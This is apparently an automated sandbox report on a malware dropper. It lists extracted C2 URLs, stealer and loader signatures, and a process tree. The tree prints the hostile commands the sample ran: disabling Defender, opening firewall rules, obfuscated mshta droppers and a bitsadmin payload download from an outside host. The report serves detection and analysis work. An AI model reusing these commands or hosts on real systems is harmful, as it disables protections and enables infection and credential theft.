Analysis
-
max time kernel
906s -
max time network
1815s -
platform
windows11_x64 -
resource
win11 -
submitted
22-10-2021 14:39
General
-
Target
setup_installer.exe
-
Size
3.9MB
-
MD5
c46908531375bab2af1aa2868ba6b7dd
-
SHA1
6af36f1f26d1d79710fb99f020b9035c3caa11b5
-
SHA256
3e74a31c3e282ab53d039b04905ea50cafacaf3d293656e1e05c0e9156b689fd
-
SHA512
fe7f9431293fba92ca6482b1ae181b30d54a72455bf9135f533583a78322082eaace64f760ee0fdd173601d8ac7047122528d5456b9b474fd89de9ff8d8fe6ee
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://gejajoo7.top/
http://sysaheu9.top/
rc4.i32
rc4.i32
Extracted
Family
icedid
Campaign
1875681804
Signatures
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 43 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
-
Checks for any installed AV software in registry 1 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 13 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
-
Suspicious use of SetThreadContext 11 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 39 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Download via BitsAdmin 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 59 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 7 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of SendNotifyMessage 5 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05eeb2dae7b88520a.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exeFri05eeb2dae7b88520a.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-V2S7D.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-V2S7D.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$20086,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe" /SILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-RU573.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-RU573.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05eeb2dae7b88520a.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-BK83A.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-BK83A.tmp\postback.exe" ss18⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05beb1e355.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05beb1e355.exeFri05beb1e355.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri055cc2a6e65.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri055cc2a6e65.exeFri055cc2a6e65.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 16365⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05cc28ce70b.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exeFri05cc28ce70b.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if """" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "" == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05cc28ce70b.exe" ) do taskkill -f /im "%~Nxj"6⤵
-
C:\Users\Admin\AppData\Local\Temp\EiV4.ExeEIv4.Exe /pllbp0ygmDYA7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if ""/pllbp0ygmDYA "" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "/pllbp0ygmDYA " == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" ) do taskkill -f /im "%~Nxj"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript: clOSe ( creAteOBJECT( "WSCrIPt.sHElL" ). rUn ( "cMD /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = ""MZ"" > YAnI.V & COPy /Y /b YANI.V + L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ + 51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_ " , 0 , tRuE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = "MZ" > YAnI.V & COPy /Y /b YANI.V +L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ +51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>YAnI.V"10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\W72F~U.S8_10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /im "Fri05cc28ce70b.exe"7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0575b7d291a755f8.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri0575b7d291a755f8.exeFri0575b7d291a755f8.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3611946.exe"C:\Users\Admin\AppData\Roaming\3611946.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\6592176.exe"C:\Users\Admin\AppData\Roaming\6592176.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8474982.exe"C:\Users\Admin\AppData\Roaming\8474982.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2536546.exe"C:\Users\Admin\AppData\Roaming\2536546.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\907323.exe"C:\Users\Admin\AppData\Roaming\907323.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05f84fa77402bf.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exeFri05f84fa77402bf.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05f84fa77402bf.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri053f5694ea31c9a.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exeFri053f5694ea31c9a.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri053f5694ea31c9a.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05b5df5106928d62.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05b5df5106928d62.exeFri05b5df5106928d62.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\o6ds5QGxKUUqphYqwpp1NMcj.exe"C:\Users\Admin\Pictures\Adobe Films\o6ds5QGxKUUqphYqwpp1NMcj.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\GEmrIdAuJTC4SU6UyNpLIyk4.exe"C:\Users\Admin\Pictures\Adobe Films\GEmrIdAuJTC4SU6UyNpLIyk4.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6fDHT2tUxULVjUTvpyzQ9uGY.exe"C:\Users\Admin\Pictures\Adobe Films\6fDHT2tUxULVjUTvpyzQ9uGY.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
-
C:\Users\Admin\Pictures\Adobe Films\x5yjjKUdFt2OAlDQL7_fYMPj.exe"C:\Users\Admin\Pictures\Adobe Films\x5yjjKUdFt2OAlDQL7_fYMPj.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\oJRm70Dm9j5lSYZ6MOMZucpS.exe"C:\Users\Admin\Pictures\Adobe Films\oJRm70Dm9j5lSYZ6MOMZucpS.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"C:\Users\Admin\Pictures\Adobe Films\usXF9zucDbMhT_78yRVLnT_L.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9.exe"C:\Users\Admin\Pictures\Adobe Films\HCXOFRiAMR5KOhUwU_ppv7b9.exe"5⤵
-
C:\Users\Admin\Documents\NMFjg_8YMS00zgFHgzMpsI3R.exe"C:\Users\Admin\Documents\NMFjg_8YMS00zgFHgzMpsI3R.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\hdHYHygrA9P_9sJLNGkiqc6P.exe"C:\Users\Admin\Pictures\Adobe Films\hdHYHygrA9P_9sJLNGkiqc6P.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\SEdbjWMsrv726vIkSIBsE9Go.exe"C:\Users\Admin\Pictures\Adobe Films\SEdbjWMsrv726vIkSIBsE9Go.exe" /mixtwo7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2568⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\d6sHYV6XlWgpQzAIDX6Lbn0g.exe"C:\Users\Admin\Pictures\Adobe Films\d6sHYV6XlWgpQzAIDX6Lbn0g.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\6xMN6qpuEr9zi2l7O2Z_5f9r.exe"C:\Users\Admin\Pictures\Adobe Films\6xMN6qpuEr9zi2l7O2Z_5f9r.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 17288⤵
- Executes dropped EXE
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\56H5vZWH3BEIS0MYbnsB5sVm.exe"C:\Users\Admin\Pictures\Adobe Films\56H5vZWH3BEIS0MYbnsB5sVm.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\zrTMrQGe8QxtPQACszHEqUvM.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zrTMrQGe8QxtPQACszHEqUvM.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NJ30J.tmp\NARe8zjEE0fBGUmV6IDsSwRu.tmp"C:\Users\Admin\AppData\Local\Temp\is-NJ30J.tmp\NARe8zjEE0fBGUmV6IDsSwRu.tmp" /SL5="$203E0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\NARe8zjEE0fBGUmV6IDsSwRu.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-UHKAS.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-UHKAS.tmp\DYbALA.exe" /S /UID=27099⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\cc-5581e-3ed-af092-dd5f6673f06fd\Dolipurape.exe"C:\Users\Admin\AppData\Local\Temp\cc-5581e-3ed-af092-dd5f6673f06fd\Dolipurape.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exe /eufive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qddiokgq.bwr\GcleanerEU.exe /eufive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10680 -s 25613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exeC:\Users\Admin\AppData\Local\Temp\uxocbf0v.bxs\installer.exe /qn CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exeC:\Users\Admin\AppData\Local\Temp\zzv344nb.4ai\any.exe12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\j0lv3wjp.gf3\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12672 -s 25213⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exe /S & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nhcn53ct.h5t\autosubplayer.exe /S12⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz3713.tmp\tempfile.ps1"13⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z13⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\lynQNpjuXTkz19lqZDKxEA1L.exe"C:\Users\Admin\Pictures\Adobe Films\lynQNpjuXTkz19lqZDKxEA1L.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\V72hLI8G_m6CbhQN1gHdnJbA.exe"C:\Users\Admin\Pictures\Adobe Films\V72hLI8G_m6CbhQN1gHdnJbA.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
- Loads dropped DLL
-
